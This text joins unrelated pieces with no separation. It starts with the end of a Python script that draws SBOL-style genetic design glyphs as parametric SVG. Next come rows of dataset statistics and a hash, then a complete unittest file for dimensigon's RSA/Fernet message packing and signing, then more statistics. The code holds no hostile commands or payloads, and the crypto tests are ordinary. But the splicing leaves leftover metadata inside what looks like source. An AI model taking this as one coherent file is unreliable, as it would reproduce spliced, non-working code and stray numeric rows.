    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []
    # Generate the paths for the glyph and add to list of paths
    spacer_path1 = {}
    spacer_path1['class'] = 'filled-path'
    spacer_path1['id'] = 'spacer-circle-path'
    spacer_path1['parametric:d'] = 'M{baseline_x+pad_before},{(baseline_y-baseline_offset)} C{baseline_x+pad_before},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)-(width/1.5)} {baseline_x+pad_before+width},{(baseline_y-baseline_offset)} C{baseline_x+pad_before+width},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)+(width/1.5)} {baseline_x+pad_before},{(baseline_y-baseline_offset)} Z'
    spacer_path1['d'] = eval_parameterised_path(spacer_path1['parametric:d'], params)
    spacer_path1['style'] = style_text['filled-path']
    glyph_paths.append(spacer_path1)
    # Calculate the angles using basic trig
    # Fixed: math.sin/math.cos take radians; the 40.0 here is a cross angle
    # in degrees, so convert first (previously sin(40 rad)/cos(40 rad) was
    # used, giving a cross at the wrong slope)
    angle = math.radians(40.0)
    sin_angle = str(math.sin(angle))
    cos_angle = str(math.cos(angle))
    # First stroke of the X through the circle
    spacer_path2 = {}
    spacer_path2['class'] = 'unfilled-path'
    spacer_path2['id'] = 'spacer-cross1-path'
    spacer_path2['parametric:d'] = 'M{(baseline_x+pad_before)+((width*0.5)-((width*0.5)*' + cos_angle +'))},{(baseline_y-baseline_offset)-((width*0.5)*' + sin_angle +')} L{(baseline_x+pad_before)+(width*0.5)+((width*0.5)*' + cos_angle +')},{(baseline_y-baseline_offset)+((width*0.5)*' + sin_angle +')}'
    spacer_path2['d'] = eval_parameterised_path(spacer_path2['parametric:d'], params)
    spacer_path2['style'] = style_text['unfilled-path']
    glyph_paths.append(spacer_path2)
    # Second stroke of the X through the circle
    spacer_path3 = {}
    spacer_path3['class'] = 'unfilled-path'
    spacer_path3['id'] = 'spacer-cross2-path'
    spacer_path3['parametric:d'] = 'M{(baseline_x+pad_before)+((width*0.5)-((width*0.5)*' + cos_angle +'))},{(baseline_y-baseline_offset)+((width*0.5)*' + sin_angle +')} L{(baseline_x+pad_before)+(width*0.5)+((width*0.5)*' + cos_angle +')},{(baseline_y-baseline_offset)-((width*0.5)*' + sin_angle +')}'
    spacer_path3['d'] = eval_parameterised_path(spacer_path3['parametric:d'], params)
    spacer_path3['style'] = style_text['unfilled-path']
    glyph_paths.append(spacer_path3)
    return header_text, glyph_paths
def aptamer_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Produce the Aptamer glyph as parametric SVG (no SO term assigned).

    Returns a tuple (header_text, glyph_paths): the SVG header string (svg,
    bounding box and baseline elements) and a single-path list for the glyph.
    """
    # General parameters, followed by the unspecified component parameters
    params = {
        'baseline_x': baseline_x,
        'baseline_y': baseline_y,
        'baseline_offset': 0,
        'pad_before': 2,
        'pad_after': 2,
        'pad_top': 3,
        'pad_bottom': 3,
        'width': 18,
    }
    # Header text: SVG element, bounding box and baseline
    header_text = svg_header('Aptamer', '', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-width-pad_top}', '{pad_before+width+pad_after}', '{pad_top+width+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # The glyph is a single filled outline built from lines and Bezier curves
    aptamer_path = {
        'class': 'filled-path',
        'id': 'aptamer-path',
        'parametric:d': 'M{(baseline_x+pad_before)+(width*0.35)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+(width*0.35)},{(baseline_y-baseline_offset)-(width*0.3)} C{(baseline_x+pad_before)+(width*0.0)},{(baseline_y-baseline_offset)-(width*0.4)} {(baseline_x+pad_before)+(width*0.3)},{(baseline_y-baseline_offset)-(width*0.9)} {(baseline_x+pad_before)+(width*0.55)},{(baseline_y-baseline_offset)-(width*0.65)} L{(baseline_x+pad_before)+(width*0.75)},{(baseline_y-baseline_offset)-(width*0.8)} C{(baseline_x+pad_before)+(width*0.72)},{(baseline_y-baseline_offset)-(width*0.95)} {(baseline_x+pad_before)+(width*0.9)},{(baseline_y-baseline_offset)-(width*1.0)} {(baseline_x+pad_before)+(width*0.97)},{(baseline_y-baseline_offset)-(width*0.92)} C{(baseline_x+pad_before)+(width*1.05)},{(baseline_y-baseline_offset)-(width*0.72)} {(baseline_x+pad_before)+(width*0.9)},{(baseline_y-baseline_offset)-(width*0.7)} {(baseline_x+pad_before)+(width*0.82)},{(baseline_y-baseline_offset)-(width*0.68)} L{(baseline_x+pad_before)+(width*0.6)},{(baseline_y-baseline_offset)-(width*0.5)} C{(baseline_x+pad_before)+(width*0.63)},{(baseline_y-baseline_offset)-(width*0.37)} {(baseline_x+pad_before)+(width*0.5)},{(baseline_y-baseline_offset)-(width*0.35)} {(baseline_x+pad_before)+(width*0.5)},{(baseline_y-baseline_offset)-(width*0.3)} L{(baseline_x+pad_before)+(width*0.5)},{(baseline_y-baseline_offset)} Z',
    }
    aptamer_path['d'] = eval_parameterised_path(aptamer_path['parametric:d'], params)
    aptamer_path['style'] = style_text['filled-path']
    glyph_paths = [aptamer_path]
    return header_text, glyph_paths
def non_coding_rna_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Produce the Non-coding RNA glyph as parametric SVG (no SO term assigned).

    Returns a tuple (header_text, glyph_paths): the SVG header string (svg,
    bounding box and baseline elements) and a single-path list for the glyph.
    """
    # General parameters, followed by the unspecified component parameters
    params = {
        'baseline_x': baseline_x,
        'baseline_y': baseline_y,
        'baseline_offset': 0,
        'pad_before': 2,
        'pad_after': 2,
        'pad_top': 3,
        'pad_bottom': 3,
        'height': 12,
        'width': 20,
    }
    # Header text: SVG element, bounding box and baseline
    header_text = svg_header('Non-coding RNA', '', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-height-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Single filled outline: a wavy top edge (three Bezier curves) closed
    # against the baseline
    ncrna_path = {
        'class': 'filled-path',
        'id': 'non-coding-rna-path',
        'parametric:d': 'M{(baseline_x+pad_before)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)},{(baseline_y-baseline_offset)-(height*0.7)} C{(baseline_x+pad_before)+(width*0.15)},{(baseline_y-baseline_offset)-(height*1.2)} {(baseline_x+pad_before)+(width*0.18)},{(baseline_y-baseline_offset)-(height*0.1)} {(baseline_x+pad_before)+(width*(5.0/15.0))},{(baseline_y-baseline_offset)-(height*0.7)} C{(baseline_x+pad_before)+(width*(0.15+(5.0/15.0)))},{(baseline_y-baseline_offset)-(height*1.2)} {(baseline_x+pad_before)+(width*(0.18+(5.0/15.0)))},{(baseline_y-baseline_offset)-(height*0.1)} {(baseline_x+pad_before)+(width*(10.0/15.0))},{(baseline_y-baseline_offset)-(height*0.7)} C{(baseline_x+pad_before)+(width*(0.15+(10.0/15.0)))},{(baseline_y-baseline_offset)-(height*1.2)} {(baseline_x+pad_before)+(width*(0.18+(10.0/15.0)))},{(baseline_y-baseline_offset)-(height*0.1)} {(baseline_x+pad_before)+(width*(15.0/15.0))},{(baseline_y-baseline_offset)-(height*0.7)} L{(baseline_x+pad_before)+width},{(baseline_y-baseline_offset)} Z',
    }
    ncrna_path['d'] = eval_parameterised_path(ncrna_path['parametric:d'], params)
    ncrna_path['style'] = style_text['filled-path']
    glyph_paths = [ncrna_path]
    return header_text, glyph_paths
def nucleic_acid_one_strand_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Produce the Nucleic Acid 1 Strand glyph as parametric SVG (no SO term).

    Returns a tuple (header_text, glyph_paths): the SVG header string (svg,
    bounding box and baseline elements) and a single-path list for the glyph.
    """
    # General parameters, followed by the unspecified component parameters
    params = {
        'baseline_x': baseline_x,
        'baseline_y': baseline_y,
        'baseline_offset': 0,
        'pad_before': 2,
        'pad_after': 2,
        'pad_top': 3,
        'pad_bottom': 3,
        'height': 12,
        'width': 20,
    }
    # Header text: SVG element, bounding box and baseline
    header_text = svg_header('Nucleic Acid 1 Strand', '', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-(height*0.5)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Single open wave: three Bezier curves oscillating about the baseline
    strand_path = {
        'class': 'unfilled-path',
        'id': 'nucleic-acid-path',
        'parametric:d': 'M{(baseline_x+pad_before)},{(baseline_y-baseline_offset)} C{(baseline_x+pad_before)+(width*0.15)},{(baseline_y-baseline_offset)-(height*0.5)} {(baseline_x+pad_before)+(width*0.18)},{(baseline_y-baseline_offset)+(height*0.5)} {(baseline_x+pad_before)+(width*(5.0/15.0))},{(baseline_y-baseline_offset)} C{(baseline_x+pad_before)+(width*(0.15+(5.0/15.0)))},{(baseline_y-baseline_offset)-(height*0.5)} {(baseline_x+pad_before)+(width*(0.18+(5.0/15.0)))},{(baseline_y-baseline_offset)+(height*0.5)} {(baseline_x+pad_before)+(width*(10.0/15.0))},{(baseline_y-baseline_offset)} C{(baseline_x+pad_before)+(width*(0.15+(10.0/15.0)))},{(baseline_y-baseline_offset)-(height*0.5)} {(baseline_x+pad_before)+(width*(0.18+(10.0/15.0)))},{(baseline_y-baseline_offset)+(height*0.5)} {(baseline_x+pad_before)+(width*(15.0/15.0))},{(baseline_y-baseline_offset)}',
    }
    strand_path['d'] = eval_parameterised_path(strand_path['parametric:d'], params)
    strand_path['style'] = style_text['unfilled-path']
    glyph_paths = [strand_path]
    return header_text, glyph_paths
def composite_svg (baseline_x=baseline_x, baseline_y=baseline_y):
    """Generate the Composite glyph.

    Returns a tuple (header_text, glyph_paths): header_text holds the SVG
    header, bounding box and baseline elements; glyph_paths is a list of
    path dictionaries with keys 'class', 'id', 'parametric:d', 'd' and
    'style', in drawing order.
    """
    params = {}
    # General parameters
    params['baseline_x'] = baseline_x
    params['baseline_y'] = baseline_y
    params['baseline_offset'] = 0
    params['pad_before'] = 2
    params['pad_after'] = 2
    params['pad_top'] = 3
    params['pad_bottom'] = 3
    # Unspecified component parameters
    params['height'] = 12
    params['width'] = 40
    # Make the header text (SVG, bounding box, and baseline elements)
    header_text = svg_header('Composite', '', parametric_defaults=params, width=svg_width, height=svg_height)
    header_text += bounding_box('{baseline_x}', '{(baseline_y-baseline_offset)-pad_top}', '{pad_before+width+pad_after}', '{pad_top+height+pad_bottom}', params, style=style_text['bounding-box'])
    header_text += baseline('{baseline_x}', '{baseline_y}', '{pad_before+width+pad_after}', params, style=style_text['baseline'])
    # Hold the individual paths for the glyph
    glyph_paths = []

    def _add_path(path_class, path_id, parametric_d):
        # Build one path dictionary (evaluating its parametric form) and
        # append it to glyph_paths.  The style is looked up by class name,
        # matching the original per-path style assignments.
        path = {}
        path['class'] = path_class
        path['id'] = path_id
        path['parametric:d'] = parametric_d
        path['d'] = eval_parameterised_path(parametric_d, params)
        path['style'] = style_text[path_class]
        glyph_paths.append(path)

    def _tick_path(side, top, bottom):
        # Parametric path for one short tick mark on a sloped edge.
        # 'side' is '+' (left edge) or '+width-' (right edge); top/bottom
        # are the fractional heights (out of 10) the tick spans, written
        # as strings so the emitted parametric text matches the original.
        return ('M{(baseline_x+pad_before)' + side + '((width*0.15)*(' + top + '/10.0))},'
                '{(baseline_y-baseline_offset)+height-(height*(' + top + '/10.0))} '
                'L{(baseline_x+pad_before)' + side + '((width*0.15)*(' + bottom + '/10.0))},'
                '{(baseline_y-baseline_offset)+height-(height*(' + bottom + '/10.0))}')

    # Filled trapezoid background.
    # NOTE(review): the original parametric path ended with 'Z}'; the stray
    # closing brace leaked into the evaluated path data and was removed.
    _add_path('filled-background-path', 'composite-background',
              'M{(baseline_x+pad_before)+(width*0.15)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+(width*0.15)},{(baseline_y-baseline_offset)-pad_top} L{(baseline_x+pad_before)+width-(width*0.15)},{(baseline_y-baseline_offset)-pad_top} L{(baseline_x+pad_before)+width-(width*0.15)},{(baseline_y-baseline_offset)} L{(baseline_x+pad_before)+width},{(baseline_y-baseline_offset)+height} L{(baseline_x+pad_before)},{(baseline_y-baseline_offset)+height} Z')
    # Left and right horizontal segments of the bottom edge.
    _add_path('unfilled-path', 'composite-path',
              'M{(baseline_x+pad_before)},{(baseline_y-baseline_offset)+height} L{(baseline_x+pad_before)+(width*0.37)},{(baseline_y-baseline_offset)+height}')
    _add_path('unfilled-path', 'composite-path',
              'M{(baseline_x+pad_before)+width-(width*0.37)},{(baseline_y-baseline_offset)+height} L{(baseline_x+pad_before)+width},{(baseline_y-baseline_offset)+height}')
    # Dashed tick marks: three along the left sloped edge, then three
    # (mirrored) along the right sloped edge, in the original order.
    for side in ('+', '+width-'):
        for top, bottom in (('10.0', '8.0'), ('6.0', '4.0'), ('2.0', '0.0')):
            _add_path('unfilled-path', 'composite-path', _tick_path(side, top, bottom))
    # Two short dashes in the middle of the bottom edge.
    _add_path('unfilled-path', 'composite-path',
              'M{(baseline_x+pad_before)+(width*0.43)},{(baseline_y-baseline_offset)+height} L{(baseline_x+pad_before)+(width*0.47)},{(baseline_y-baseline_offset)+height}')
    _add_path('unfilled-path', 'composite-path',
              'M{(baseline_x+pad_before)+(width*0.53)},{(baseline_y-baseline_offset)+height} L{(baseline_x+pad_before)+(width*0.57)},{(baseline_y-baseline_offset)+height}')
    return header_text, glyph_paths
###############################################################################
# Generate complete set of SVG files
###############################################################################
# Add new glyphs in here until whole set is present
glyphs_to_process = [
    ['RibosomeEntrySite.svg', rbs_svg],
    ['Promoter.svg', promoter_svg],
    ['Terminator.svg', terminator_svg],
    ['CDS.svg', cds_svg],
    ['Primer.svg', primer_svg],
    ['OriginOfReplication.svg', origin_of_replication_svg],
    ['Unspecified.svg', unspecified_svg],
    ['OmittedDetail.svg', omitted_detail_svg],
    ['RecombinationSite.svg', recombination_site_svg],
    ['NoGlyph.svg', no_glyph_svg],
    ['Operator.svg', operator_svg],
    ['AssemblyScar.svg', assembly_scar_svg],
    ['BluntRestrictionSite.svg', blunt_restriction_site_svg],
    ['EngineeredRegion.svg', engineered_region_svg],
    ['Insulator.svg', insulator_svg],
    ['OriginOfTransfer.svg', origin_of_transfer_svg],
    ['StickyEndRestrictionEnzymeCleavageSite5.svg', sticky_restriction_site_5_svg],
    ['StickyEndRestrictionEnzymeCleavageSite3.svg', sticky_restriction_site_3_svg],
    ['OverhangSite5.svg', overhang_site_5_svg],
    ['OverhangSite3.svg', overhang_site_3_svg],
    ['Signature.svg', signature_svg],
    ['PolyASite.svg', poly_a_site_svg],
    ['DNALocation.svg', dna_location_svg],
    ['DNACleavageSite.svg', dna_cleavage_site_svg],
    ['DNAStabilityElement.svg', dna_stability_element_svg],
    ['Spacer.svg', spacer_svg],
    ['Aptamer.svg', aptamer_svg],
    ['NonCodingRNA.svg', non_coding_rna_svg],
    ['NucleicAcidOneStrand.svg', nucleic_acid_one_strand_svg],
    ['Composite.svg', composite_svg]]
# Final glyphs saved here with details (e.g. baseline and bounding box)
OUTPUT_PREFIX_FULL = './glyphs_2.0/'
INCLUDE_BOUNDING_BOX = True
INCLUDE_BASELINE = True
# NOTE(review): this reassignment discards the full glyph list built above and
# replaces it with a 4-glyph subset, so only these four SVG files are actually
# generated. It looks like a debugging leftover — confirm whether the full list
# should be restored (delete this reassignment to generate every glyph).
glyphs_to_process = [['Terminator.svg', terminator_svg],
                     ['Promoter.svg', promoter_svg],
                     ['RibosomeEntrySite.svg', rbs_svg],
                     ['CDS.svg', cds_svg]]
# For each selected glyph: call its builder to get the SVG header and path
# dictionaries, then write them out under OUTPUT_PREFIX_FULL.
for el in glyphs_to_process:
    header_text, glyph_paths = el[1]()
    write_glyph_svg(OUTPUT_PREFIX_FULL+el[0], header_text, glyph_paths)
| 62.925735
| 1,413
| 0.741245
| 12,756
| 85,579
| 4.674428
| 0.029476
| 0.0643
| 0.097221
| 0.111091
| 0.869791
| 0.827511
| 0.792108
| 0.770641
| 0.760142
| 0.732806
| 0
| 0.02371
| 0.08134
| 85,579
| 1,359
| 1,414
| 62.972038
| 0.73473
| 0.086283
| 0
| 0.52993
| 0
| 0.065141
| 0.494269
| 0.349206
| 0.00088
| 0
| 0
| 0
| 0
| 1
| 0.03169
| false
| 0
| 0.001761
| 0
| 0.066021
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e83a3b1e8fa92b7d9f52a47e51de4b197fdc7bfa
| 13,158
|
py
|
Python
|
tests/integration/network/test_pack.py
|
dimensigon/dimensigon
|
079d7c91a66e10f13510d89844fbadb27e005b40
|
[
"Apache-2.0"
] | 2
|
2020-11-20T10:27:14.000Z
|
2021-02-21T13:57:56.000Z
|
tests/integration/network/test_pack.py
|
dimensigon/dimensigon
|
079d7c91a66e10f13510d89844fbadb27e005b40
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/network/test_pack.py
|
dimensigon/dimensigon
|
079d7c91a66e10f13510d89844fbadb27e005b40
|
[
"Apache-2.0"
] | null | null | null |
from collections import OrderedDict
from unittest import TestCase
from unittest.mock import patch
import rsa
from cryptography.fernet import Fernet
from dimensigon.network.encryptation import pack_msg, unpack_msg
class TestPack_msg_pickle(TestCase):
    """Round-trip tests for pack_msg/unpack_msg with a pickle-style payload
    (a dict containing an 'id' field alongside the test data)."""

    @classmethod
    def setUpClass(cls) -> None:
        # One RSA key pair and one Fernet symmetric key shared by all tests.
        cls.pub_key, cls.priv_key = rsa.newkeys(1024)
        cls.source = 'source'
        cls.dest = 'dest'
        cls.data = {'test': 'some random data', 'id': '11111111-2222-3333-4444-55555555abcd'}
        cls.sym_key = Fernet.generate_key()

    def _check_fields(self, msg, present, absent=()):
        # Assert which envelope fields the packed message does / does not carry.
        for name in present:
            self.assertIn(name, msg)
        for name in absent:
            self.assertNotIn(name, msg)

    def test_pack_unpack_msg_with_keys(self):
        packed = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
        self._check_fields(packed, ('source', 'destination', 'key', 'signature', 'enveloped_data'))
        self.assertDictEqual(self.data, unpack_msg(packed, self.pub_key, self.priv_key))

    def test_pack_unpack_msg_with_keys_change_dict_order(self):
        packed = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
        self._check_fields(packed, ('source', 'destination', 'key', 'signature', 'enveloped_data'))
        # Move 'enveloped_data' to the end: unpacking must not rely on order.
        packed = OrderedDict(packed)
        packed['enveloped_data'] = packed.pop('enveloped_data')
        self.assertDictEqual(self.data, unpack_msg(packed, self.pub_key, self.priv_key))

    def test_pack_unpack_msg_without_keys(self):
        packed = pack_msg(self.data, self.dest, self.source)
        self._check_fields(packed, ('source', 'destination', 'enveloped_data'),
                           absent=('key', 'signature'))
        self.assertDictEqual(self.data, unpack_msg(packed))

    def test_unpack_signature_error(self):
        packed = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
        # Tampering with a signed field must break signature verification.
        packed.update(source='changed')
        with self.assertRaises(rsa.pkcs1.VerificationError):
            unpack_msg(packed, self.pub_key, self.priv_key)

    def test_pack_unpack_with_symmetric_key(self):
        packed = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
                          symmetric_key=self.sym_key)
        self._check_fields(packed, ('source', 'destination', 'signature', 'enveloped_data'),
                           absent=('key',))
        # The symmetric key alone is rejected for a signed message.
        with self.assertRaises(ValueError) as e:
            unpacked = unpack_msg(packed, symmetric_key=self.sym_key)
        unpacked = unpack_msg(packed, pub_key=self.pub_key, priv_key=self.priv_key, symmetric_key=self.sym_key)
        self.assertDictEqual(self.data, unpacked)

    def test_pack_unpack_with_symmetric_key_force_key(self):
        packed = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
                          symmetric_key=self.sym_key,
                          add_key=True)
        self._check_fields(packed, ('source', 'destination', 'key', 'signature', 'enveloped_data'))
        with self.assertRaises(ValueError) as e:
            unpacked = unpack_msg(packed, symmetric_key=self.sym_key)
        unpacked = unpack_msg(packed, pub_key=self.pub_key, priv_key=self.priv_key)
        self.assertDictEqual(self.data, unpacked)

    def test_pack_unpack_with_symmetric_key_no_rsa_keys(self):
        packed = pack_msg(self.data, self.dest, self.source, symmetric_key=self.sym_key)
        self._check_fields(packed, ('source', 'destination', 'enveloped_data'),
                           absent=('key', 'signature'))
        self.assertDictEqual(self.data, unpack_msg(packed, symmetric_key=self.sym_key))

    def test_pack_unpack_with_symmetric_key_encrypted(self):
        encrypted_key = rsa.encrypt(self.sym_key, self.pub_key)
        packed = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
                          cipher_key=encrypted_key)
        self._check_fields(packed, ('source', 'destination', 'signature', 'enveloped_data'),
                           absent=('key',))
        with self.assertRaises(ValueError) as e:
            unpack_msg(packed, symmetric_key=self.sym_key)
        unpacked = unpack_msg(packed, pub_key=self.pub_key, priv_key=self.priv_key,
                              cipher_key=encrypted_key)
        self.assertDictEqual(self.data, unpacked)

    def test_pack_error(self):
        encrypted_key = rsa.encrypt(self.sym_key, self.pub_key)
        # This argument combination must be rejected with a ValueError.
        with self.assertRaises(ValueError) as e:
            pack_msg(self.data, self.dest, self.source, pub_key=self.pub_key, cipher_key=encrypted_key)

    @patch('dimensigon.utils.helpers.Fernet.generate_key')
    def test_unpack_with_symmetric_key_as_parameter_and_cipher_in_msg(self, mocked_generate_key):
        # Force pack_msg to generate our known symmetric key internally.
        mocked_generate_key.return_value = self.sym_key
        packed = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
        self._check_fields(packed, ('source', 'destination', 'key', 'signature', 'enveloped_data'))
        with self.assertRaises(ValueError) as e:
            unpack_msg(packed, symmetric_key=self.sym_key)
        unpacked = unpack_msg(packed, pub_key=self.pub_key, priv_key=self.priv_key, symmetric_key=self.sym_key)
        self.assertDictEqual(self.data, unpacked)
class TestPack_msg_json(TestCase):
    """Round-trip tests for pack_msg/unpack_msg with a JSON-style payload.

    Mirrors TestPack_msg_pickle but with a simpler data dict, plus two
    empty-payload cases at the end.
    """

    @classmethod
    def setUpClass(cls) -> None:
        # One RSA key pair and one Fernet symmetric key shared by all tests.
        cls.pub_key, cls.priv_key = rsa.newkeys(1024)
        cls.source = 'source'
        cls.dest = 'dest'
        cls.data = {'test': 'some random data'}
        cls.sym_key = Fernet.generate_key()

    def test_pack_unpack_msg_with_keys(self):
        # Signing keys supplied: envelope carries 'key' and 'signature'.
        packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
        self.assertIn('source', packed_msg)
        self.assertIn('destination', packed_msg)
        self.assertIn('key', packed_msg)
        self.assertIn('signature', packed_msg)
        self.assertIn('enveloped_data', packed_msg)
        unpacked_msg = unpack_msg(packed_msg, self.pub_key, self.priv_key)
        self.assertDictEqual(self.data, unpacked_msg)

    def test_pack_unpack_msg_without_keys(self):
        # No keys: message is packed unsigned and without a session key.
        packed_msg = pack_msg(self.data, self.dest, self.source)
        self.assertIn('source', packed_msg)
        self.assertIn('destination', packed_msg)
        self.assertNotIn('key', packed_msg)
        self.assertNotIn('signature', packed_msg)
        self.assertIn('enveloped_data', packed_msg)
        unpacked_data = unpack_msg(packed_msg)
        self.assertDictEqual(self.data, unpacked_data)

    def test_unpack_signature_error(self):
        # Tampering with a signed field must break signature verification.
        packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
        packed_msg.update(source='changed')
        with self.assertRaises(rsa.pkcs1.VerificationError):
            unpack_msg(packed_msg, self.pub_key, self.priv_key)

    def test_pack_unpack_with_symmetric_key(self):
        packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
                              symmetric_key=self.sym_key)
        self.assertIn('source', packed_msg)
        self.assertIn('destination', packed_msg)
        self.assertNotIn('key', packed_msg)
        self.assertIn('signature', packed_msg)
        self.assertIn('enveloped_data', packed_msg)
        # The symmetric key alone is rejected for a signed message.
        with self.assertRaises(ValueError):
            unpacked_msg = unpack_msg(packed_msg, symmetric_key=self.sym_key)
        unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key, symmetric_key=self.sym_key)
        self.assertDictEqual(self.data, unpacked_msg)

    def test_pack_unpack_with_symmetric_key_force_key(self):
        # add_key=True forces the session key into the envelope even though
        # an explicit symmetric key was supplied.
        packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
                              symmetric_key=self.sym_key,
                              add_key=True)
        self.assertIn('source', packed_msg)
        self.assertIn('destination', packed_msg)
        self.assertIn('key', packed_msg)
        self.assertIn('signature', packed_msg)
        self.assertIn('enveloped_data', packed_msg)
        with self.assertRaises(ValueError):
            unpacked_msg = unpack_msg(packed_msg, symmetric_key=self.sym_key)
        unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key)
        self.assertDictEqual(self.data, unpacked_msg)

    def test_pack_unpack_with_symmetric_key_no_rsa_keys(self):
        packed_msg = pack_msg(self.data, self.dest, self.source, symmetric_key=self.sym_key)
        self.assertIn('source', packed_msg)
        self.assertIn('destination', packed_msg)
        self.assertNotIn('key', packed_msg)
        self.assertNotIn('signature', packed_msg)
        self.assertIn('enveloped_data', packed_msg)
        unpacked_msg = unpack_msg(packed_msg, symmetric_key=self.sym_key)
        self.assertDictEqual(self.data, unpacked_msg)

    def test_pack_unpack_with_symmetric_key_encrypted(self):
        sym_key_encrypted = rsa.encrypt(self.sym_key, self.pub_key)
        packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key,
                              cipher_key=sym_key_encrypted)
        self.assertIn('source', packed_msg)
        self.assertIn('destination', packed_msg)
        self.assertNotIn('key', packed_msg)
        self.assertIn('signature', packed_msg)
        self.assertIn('enveloped_data', packed_msg)
        with self.assertRaises(ValueError):
            unpack_msg(packed_msg, symmetric_key=self.sym_key)
        unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key,
                                  cipher_key=sym_key_encrypted)
        self.assertDictEqual(self.data, unpacked_msg)

    def test_pack_error(self):
        sym_key_encrypted = rsa.encrypt(self.sym_key, self.pub_key)
        # This argument combination must be rejected with a ValueError.
        with self.assertRaises(ValueError):
            pack_msg(self.data, self.dest, self.source, pub_key=self.pub_key, cipher_key=sym_key_encrypted)

    @patch('dimensigon.utils.helpers.Fernet.generate_key')
    def test_unpack_with_symmetric_key_as_parameter_and_cipher_in_msg(self, mocked_generate_key):
        # Force pack_msg to generate our known symmetric key internally.
        # (An unused sym_key_encrypted local from the original was removed.)
        mocked_generate_key.return_value = self.sym_key
        packed_msg = pack_msg(self.data, self.dest, self.source, self.pub_key, self.priv_key)
        self.assertIn('source', packed_msg)
        self.assertIn('destination', packed_msg)
        self.assertIn('key', packed_msg)
        self.assertIn('signature', packed_msg)
        self.assertIn('enveloped_data', packed_msg)
        with self.assertRaises(ValueError):
            unpack_msg(packed_msg, symmetric_key=self.sym_key)
        unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key, symmetric_key=self.sym_key)
        self.assertDictEqual(self.data, unpacked_msg)

    def test_unpack_without_data_and_keys(self):
        # An empty payload still round-trips when signed.
        packed_msg = pack_msg({}, self.dest, self.source, self.pub_key, self.priv_key)
        self.assertIn('source', packed_msg)
        self.assertIn('destination', packed_msg)
        self.assertIn('key', packed_msg)
        self.assertIn('signature', packed_msg)
        self.assertIn('enveloped_data', packed_msg)
        with self.assertRaises(ValueError):
            unpack_msg(packed_msg, symmetric_key=self.sym_key)
        unpacked_msg = unpack_msg(packed_msg, pub_key=self.pub_key, priv_key=self.priv_key, symmetric_key=self.sym_key)
        self.assertDictEqual({}, unpacked_msg)

    def test_unpack_without_data_and_without_keys(self):
        # An empty payload also round-trips completely unprotected.
        packed_msg = pack_msg({}, self.dest, self.source)
        self.assertIn('source', packed_msg)
        self.assertIn('destination', packed_msg)
        self.assertNotIn('key', packed_msg)
        self.assertNotIn('signature', packed_msg)
        self.assertIn('enveloped_data', packed_msg)
        unpacked_msg = unpack_msg(packed_msg)
        self.assertDictEqual({}, unpacked_msg)
| 41.771429
| 119
| 0.69091
| 1,744
| 13,158
| 4.894495
| 0.049885
| 0.145501
| 0.115745
| 0.132849
| 0.95724
| 0.95724
| 0.955483
| 0.954545
| 0.946931
| 0.946931
| 0
| 0.003637
| 0.205958
| 13,158
| 314
| 120
| 41.904459
| 0.813361
| 0
| 0
| 0.917749
| 0
| 0
| 0.072883
| 0.009424
| 0
| 0
| 0
| 0
| 0.497836
| 1
| 0.099567
| false
| 0
| 0.025974
| 0
| 0.134199
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
